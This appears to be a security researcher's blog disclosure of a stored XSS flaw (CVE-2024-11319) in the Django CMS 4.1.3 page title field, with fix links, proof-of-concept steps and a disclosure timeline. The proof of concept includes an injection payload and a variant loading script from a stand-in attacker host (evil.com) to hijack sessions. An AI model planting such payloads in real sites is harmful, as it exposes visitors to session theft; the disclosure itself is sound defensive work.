security research
iltosec
← back to blog
Xss CVE CMS CVE

Django CMS 4.1.3 Stored XSS Vulnerability: Exploiting the Page Title Field

2024-11-11 3 min min read 4400 15

Security Update: Issue Fixed

The fix for this vulnerability has been committed here:
https://github.com/django-cms/django-cms/commit/241d1cbe47a68f5d271ce4d27ad5e32e2c360ec3

Vendor Advisory:

https://www.django-cms.org/en/blog/2024/11/13/django-cms-security-update/

Django CMS version 4.1.3 is affected by a stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject arbitrary JavaScript code that is executed in the context of the web application, potentially compromising the safety of all users visiting the affected page.

CVE-ID: CVE-2024-11319

CVSS Score:

CVSS v3.1 Base Score: 3,8 - Low

Affected Versions:

Vulnerability Summary:

A stored XSS vulnerability was identified in Django CMS 4.1.3. It occurs in the Page Title field of the Page Creation interface under the /admin/cms/pagecontent/ endpoint. This vulnerability allows an attacker to inject JavaScript into the title, which will later be rendered in the page context, causing the injected code to execute when a user visits the affected page.

Technical Details:

<meta property="og:title" content="{% page_attribute "page_title" %}"/>

When an admin user creates or edits a page, if malicious content is entered in the Page Title field, it is stored in the database and then rendered on the public-facing page without proper sanitization or output encoding. This allows the attacker to execute arbitrary JavaScript code in the context of any user visiting the page.

Proof of Concept:

  1. Log in as an admin-level user.
  2. Navigate to /admin/cms/pagecontent/ to create a new page.
  3. In the Page Title field, input the following payload:
    • "><img src=x onerror=alert('iltosec') any

  1. Save the page.
  2. When visiting the public page, the JavaScript code executes, displaying an alert with the message 'iltosec'.

Alternatively, an attacker could use a payload like:

    • "><script src="http://evil.com/xss.js"> iltosec

This would load and execute a malicious script hosted on an external server, compromising the visitor's session or exfiltrating data.

Remediation:

Timeline:

Date

Status

09-NOV-2024

Reported to vendor

12-NOV-2024

Vendor acknowledgement

12-NOV-2024

Vulnerability fixed

13-NOV-2024

Patch available

18-NOV-2024

Public disclosure
found this useful?
share on x ↗
related posts
CVE-2026-48493: Privilege Escalation via Permission Bypass in Snipe-IT
Technical breakdown of CVE-2026-48493: Users with users.edit permission escalate to near-full system access via PreserveUnauthorizedPrivilegedPermissionsAction bypass. Detailed PoC and impact analysis.
2026-05-28
88
CVE
CVE-2026-48492: User Account Enumeration via Missing Authorization in Snipe-IT
Technical breakdown of CVE-2026-48492: A missing authorization flaw in Snipe-IT allowing authenticated users to enumerate accounts via the API.
2026-05-27
127
Rce
FacturaScripts <= 2026 Authenticated RCE via Malicious Plugin Upload
Detailed vulnerability analysis of an Authenticated Remote Code Execution (RCE) in FacturaScripts (<= 2026). Explore the PoC via malicious plugin upload and learn about server hardening mitigations.
2026-05-01
231
Rce · CMS
.NET Deserialization Leading to Remote Code Execution (CVE-2019-18211)
This blog post explains the black-box exploitation of Composite C1 CMS via CVE-2019-18211. The deserialization vulnerability in the EntityTokenSerializer class allows attackers to achieve remote code execution (RCE) on the server. Step-by-step attack and mitigation recommendations are provided.
2025-08-15
1078